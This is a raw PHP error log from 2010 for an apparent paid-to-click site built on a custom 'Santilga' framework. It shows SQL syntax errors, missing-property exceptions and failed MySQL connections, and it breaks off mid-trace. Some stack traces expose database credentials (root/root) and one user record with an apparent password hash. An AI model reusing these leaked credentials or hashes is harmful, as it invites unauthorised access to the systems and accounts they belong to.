C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 13.07.10 08:51:36- Uncaught Santilga_Helper_Exception, code: 0,Message: No such helper exist - user

#0 Santilga_Error->ExceptionHandler(Santilga_Helper_Exception Object ([] => No such helper exist - user,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\helper\Helper.php,[] => 23,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 30,[function] => __get,[class] => Santilga_Helper,[type] => ->,[args] => Array ([0] => user)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 13.07.10 10:41:04- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '10:41:04))' at line 1,SQL:SELECT COUNT(*) as count FROM referal WHERE referrerId='20' AND (isLifeTime='1' or (isLifeTime='1' and dateExpire < 2010-07-13 10:41:04))

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '10:41:04))' at line 1,SQL:SELECT COUNT(*) as count FROM referal WHERE referrerId='20' AND (isLifeTime='1' or (isLifeTime='1' and dateExpire < 2010-07-13 10:41:04)) ,[] => ,[] => 1064,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 72,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT COUNT(*) as count FROM referal WHERE referrerId='20' AND (isLifeTime='1' or (isLifeTime='1' and dateExpire < 2010-07-13 10:41:04)) )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 223,[function] => getResultRow,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT COUNT(*) as count FROM referal WHERE referrerId='20' AND (isLifeTime='1' or (isLifeTime='1' and dateExpire < 2010-07-13 10:41:04)) )),[2] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 50,[function] => getBeanCount,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => referrerId='20',[1] => (isLifeTime='1' or (isLifeTime='1' and dateExpire < 2010-07-13 10:41:04))))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 13.07.10 10:41:44- Uncaught Santilga_Database_Exception, code: 1054,Message: Unknown column 'userId' in 'where clause',SQL:SELECT `user`.* FROM user WHERE userId in (15) ORDER BY registrationDate desc

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Unknown column 'userId' in 'where clause',SQL:SELECT `user`.* FROM user WHERE userId in (15) ORDER BY registrationDate desc ,[] => ,[] => 1054,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `user`.* FROM user WHERE userId in (15) ORDER BY registrationDate desc )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `user`.* FROM user WHERE userId in (15) ORDER BY registrationDate desc )),[2] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 99,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => userId in (15)),[1] => Array ([0] => registrationDate desc))),[3] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 69,[function] => _getReferalUsers,[class] => Referal_Controller,[type] => ->,[args] => Array ([0] => Array ([0] => Referal_Bean Object ([] => referal,[] => id,[] => 1,[] => 4,[] => 15,[] => 2010-06-25 06:34:38,[] => 0000-00-00 00:00:00,[] => 1,[] => 0,[] => 1)))),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 13.07.10 11:04:57- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 152

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 152, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:expired,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\referal\referal.php,[line] => 72,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => expired)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\referal\referal.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 153,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => referal,[1] => referal,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 74,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => referal,[1] => referal)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:152]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:expired,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\referal\referal.php,[line] => 72,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => expired)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\referal\referal.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 153,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => referal,[1] => referal,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 74,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => referal,[1] => referal)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 13.07.10 12:17:57- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and dateExpire < '2010-07-13 12:17:57'' at line 1,SQL:SELECT COUNT(*) as count FROM referal WHERE referrerId='4' AND isLifeTime='0' AND and dateExpire < '2010-07-13 12:17:57'

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and dateExpire < '2010-07-13 12:17:57'' at line 1,SQL:SELECT COUNT(*) as count FROM referal WHERE referrerId='4' AND isLifeTime='0' AND and dateExpire < '2010-07-13 12:17:57' ,[] => ,[] => 1064,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 72,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT COUNT(*) as count FROM referal WHERE referrerId='4' AND isLifeTime='0' AND and dateExpire < '2010-07-13 12:17:57' )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 223,[function] => getResultRow,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT COUNT(*) as count FROM referal WHERE referrerId='4' AND isLifeTime='0' AND and dateExpire < '2010-07-13 12:17:57' )),[2] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 107,[function] => getBeanCount,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => referrerId='4',[1] => isLifeTime='0',[2] => and dateExpire < '2010-07-13 12:17:57'))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => addAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 17.07.10 11:24:53- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1,SQL:SELECT user.* FROM user WHERE user.id != '4' AND user.block = '0' AND user.id not in (select referalId from referal where (isLifeTime='0' and dateExpire > '2010-07-17 11:24:53' or isLifeTime='1') ORDER BY registrationDate desc LIMIT 0,100

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1,SQL:SELECT user.* FROM user WHERE user.id != '4' AND user.block = '0' AND user.id not in (select referalId from referal where (isLifeTime='0' and dateExpire > '2010-07-17 11:24:53' or isLifeTime='1') ORDER BY registrationDate desc LIMIT 0,100,[] => ,[] => 1064,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user.* FROM user WHERE user.id != '4' AND user.block = '0' AND user.id not in (select referalId from referal where (isLifeTime='0' and dateExpire > '2010-07-17 11:24:53' or isLifeTime='1') ORDER BY registrationDate desc LIMIT 0,100)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user.* FROM user WHERE user.id != '4' AND user.block = '0' AND user.id not in (select referalId from referal where (isLifeTime='0' and dateExpire > '2010-07-17 11:24:53' or isLifeTime='1') ORDER BY registrationDate desc LIMIT 0,100)),[2] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 269,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => user.id != '4',[1] => user.block = '0',[2] => user.id not in (select referalId from referal where (isLifeTime='0' and dateExpire > '2010-07-17 11:24:53' or isLifeTime='1')),[1] => Array ([0] => registrationDate desc),[2] => 100,[3] => 0,[4] => *)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 119,[function] => _getPotentialReferals,[class] => Referal_Controller,[type] => ->,[args] => Array ([0] => User_Bean Object ([] => user,[] => id,[] => 4,[] => 1,[] => ,[] => third,[] => bd928ce41ed7f50bc3c6bf43ac36e79e,[] => NULL,[] => 0,[] => third@email.de,[] => third@email.de,[] => third@email.de,[] => NULL,[] => 2138013484,[] => NULL,[] => 0,[] => 1970-01-01,[] => 2010-06-24 12:48:18,[] => 0000-00-00 00:00:00,[] => 2.000,[] => NULL,[] => NULL,[] => 10,[] => 6.410,[] => 1.200,[] => 0,[] => 200,[] => 0,[] => 2010-07-24 11:04:31,[] => 0000-00-00 00:00:00),[1] => 100)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => addAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 19.07.10 07:34:02- Uncaught Santilga_Database_Exception, code: 1305,Message: FUNCTION user_group.max does not exist,SQL:SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1'

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => FUNCTION user_group.max does not exist,SQL:SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' ,[] => ,[] => 1305,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' )),[2] => Array ([file] => C:\Server\ptc\application\helpers\Userstat.php,[line] => 26,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => published='1'),[1] => Array (),[2] => ,[3] => ,[4] => max(level) as maxLevel)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 4)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 19.07.10 07:40:39- Uncaught Santilga_Database_Exception, code: 1305,Message: FUNCTION user_group.max does not exist,SQL:SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1'

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => FUNCTION user_group.max does not exist,SQL:SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' ,[] => ,[] => 1305,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' )),[2] => Array ([file] => C:\Server\ptc\application\helpers\Userstat.php,[line] => 26,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => published='1'),[1] => Array (),[2] => ,[3] => ,[4] => max(level) as maxLevel)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 4)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 19.07.10 07:41:46- Uncaught Santilga_Database_Exception, code: 1305,Message: FUNCTION user_group.max does not exist,SQL:SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1'

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => FUNCTION user_group.max does not exist,SQL:SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' ,[] => ,[] => 1305,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user_group.max(level) AS maxLevel FROM user_group WHERE published='1' )),[2] => Array ([file] => C:\Server\ptc\application\helpers\Userstat.php,[line] => 26,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => published='1'),[1] => Array (),[2] => ,[3] => ,[4] => max(level) as maxLevel)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 4)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 19.07.10 09:38:11- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(DATE(registrationDate)) FROM user' at line 1,SQL:SELECT user.TO_DAYS(DATE(NOW())) AS TO_DAYS(DATE(registrationDate)) FROM user

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(DATE(registrationDate)) FROM user' at line 1,SQL:SELECT user.TO_DAYS(DATE(NOW())) AS TO_DAYS(DATE(registrationDate)) FROM user ,[] => ,[] => 1064,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user.TO_DAYS(DATE(NOW())) AS TO_DAYS(DATE(registrationDate)) FROM user )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT user.TO_DAYS(DATE(NOW())) AS TO_DAYS(DATE(registrationDate)) FROM user )),[2] => Array ([file] => C:\Server\ptc\application\controllers\Upgrade.php,[line] => 25,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array (),[1] => Array (),[2] => ,[3] => ,[4] => TO_DAYS(DATE(NOW())) - TO_DAYS(DATE(registrationDate)))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Upgrade_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 19.07.10 12:42:50- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:upgradeMessage

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:upgradeMessage,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Upgrade.php,[line] => 70,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => upgradeMessage,[1] => )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Upgrade_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 20.07.10 07:26:34- WARNING: require_once(OFC/JSON_Format.php) [function.require-once]: failed to open stream: No such file or directory in C:\Server\ptc\application\charts\OFC\OFC_Chart.php on line 26

#0 Santilga_Error->ErrorHandler(2, require_once(OFC/JSON_Format.php) [function.require-once]: failed to open stream: No such file or directory, C:\Server\ptc\application\charts\OFC\OFC_Chart.php, 26, Array ([filename] => OFC_Chart.php,[path] => C:\Server\ptc\application\charts/OFC/OFC_Chart.php)) called at [C:\Server\ptc\application\charts\OFC\OFC_Chart.php:26]
#1 require_once() called at [C:\Server\ptc\application\charts\OFC\OFC_Chart.php:26]
#2 require_once(C:\Server\ptc\application\charts\OFC\OFC_Chart.php) called at [C:\Server\ptc\application\charts\Sofc.php:185]
#3 Sofc_Chart->_initOfc() called at [C:\Server\ptc\application\charts\Sofc.php:55]
#4 Sofc_Chart->__construct() called at [C:\Server\ptc\application\charts\Sofc.php:60]
#5 Sofc_Chart::getInstance() called at [C:\Server\ptc\application\controllers\Account.php:12]
#6 Account_Controller->indexAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:48]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 20.07.10 07:37:46- WARNING: require_once(OFC/Charts/OFC_Charts_Area.php) [function.require-once]: failed to open stream: No such file or directory in C:\Server\ptc\application\charts\OFC\Charts\Area\OFC_Charts_Area_Hollow.php on line 21

#0 Santilga_Error->ErrorHandler(2, require_once(OFC/Charts/OFC_Charts_Area.php) [function.require-once]: failed to open stream: No such file or directory, C:\Server\ptc\application\charts\OFC\Charts\Area\OFC_Charts_Area_Hollow.php, 21, Array ([filename] => Charts/Area/OFC_Charts_Area_Hollow.php,[path] => C:\Server\ptc\application\charts/OFC/Charts/Area/OFC_Charts_Area_Hollow.php)) called at [C:\Server\ptc\application\charts\OFC\Charts\Area\OFC_Charts_Area_Hollow.php:21]
#1 require_once() called at [C:\Server\ptc\application\charts\OFC\Charts\Area\OFC_Charts_Area_Hollow.php:21]
#2 require_once(C:\Server\ptc\application\charts\OFC\Charts\Area\OFC_Charts_Area_Hollow.php) called at [C:\Server\ptc\application\charts\Sofc.php:186]
#3 Sofc_Chart->_initOfc() called at [C:\Server\ptc\application\charts\Sofc.php:55]
#4 Sofc_Chart->__construct() called at [C:\Server\ptc\application\charts\Sofc.php:60]
#5 Sofc_Chart::getInstance() called at [C:\Server\ptc\application\controllers\Account.php:12]
#6 Account_Controller->indexAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:48]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 20.07.10 10:08:29- WARNING: Missing argument 4 for OFC_Elements_Axis_X_Label::OFC_Elements_Axis_X_Label(), called in C:\Server\ptc\application\charts\Sofc.php on line 103 and defined in C:\Server\ptc\application\charts\OFC\Elements\Axis\OFC_Elements_Axis_X_Label.php on line 23

#0 Santilga_Error->ErrorHandler(2, Missing argument 4 for OFC_Elements_Axis_X_Label::OFC_Elements_Axis_X_Label(), called in C:\Server\ptc\application\charts\Sofc.php on line 103 and defined, C:\Server\ptc\application\charts\OFC\Elements\Axis\OFC_Elements_Axis_X_Label.php, 23, Array ([text] => hello nuvo,[colour] => #000000,[size] => 15)) called at [C:\Server\ptc\application\charts\OFC\Elements\Axis\OFC_Elements_Axis_X_Label.php:23]
#1 OFC_Elements_Axis_X_Label->OFC_Elements_Axis_X_Label(hello nuvo, #000000, 15) called at [C:\Server\ptc\application\charts\Sofc.php:103]
#2 Sofc_Chart->threedBarChart() called at [C:\Server\ptc\application\controllers\Account.php:29]
#3 Account_Controller->flashdataAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#4 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:48]
#5 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 21.07.10 11:27:49- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Can't connect to MySQL server on 'localhost' (10061)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Can't connect to MySQL server on 'localhost' (10061),[] => ,[] => 2,[] => E:\servers\xampp\htdocs\ptc\libraries\santilga\database\driver\Mysql.php,[] => 18,[] => Array ([0] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => root,[password] => root,[database] => clicktopay))),[1] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => E:\servers\xampp\htdocs\ptc\application\Init.php,[line] => 10,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => E:\servers\xampp\htdocs\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ())),[] => ))
Error!! 21.07.10 11:30:00- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Can't connect to MySQL server on 'localhost' (10061)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Can't connect to MySQL server on 'localhost' (10061),[] => ,[] => 2,[] => E:\servers\xampp\htdocs\ptc\libraries\santilga\database\driver\Mysql.php,[] => 18,[] => Array ([0] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => root,[password] => root,[database] => clicktopay))),[1] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => E:\servers\xampp\htdocs\ptc\application\Init.php,[line] => 10,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => E:\servers\xampp\htdocs\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => 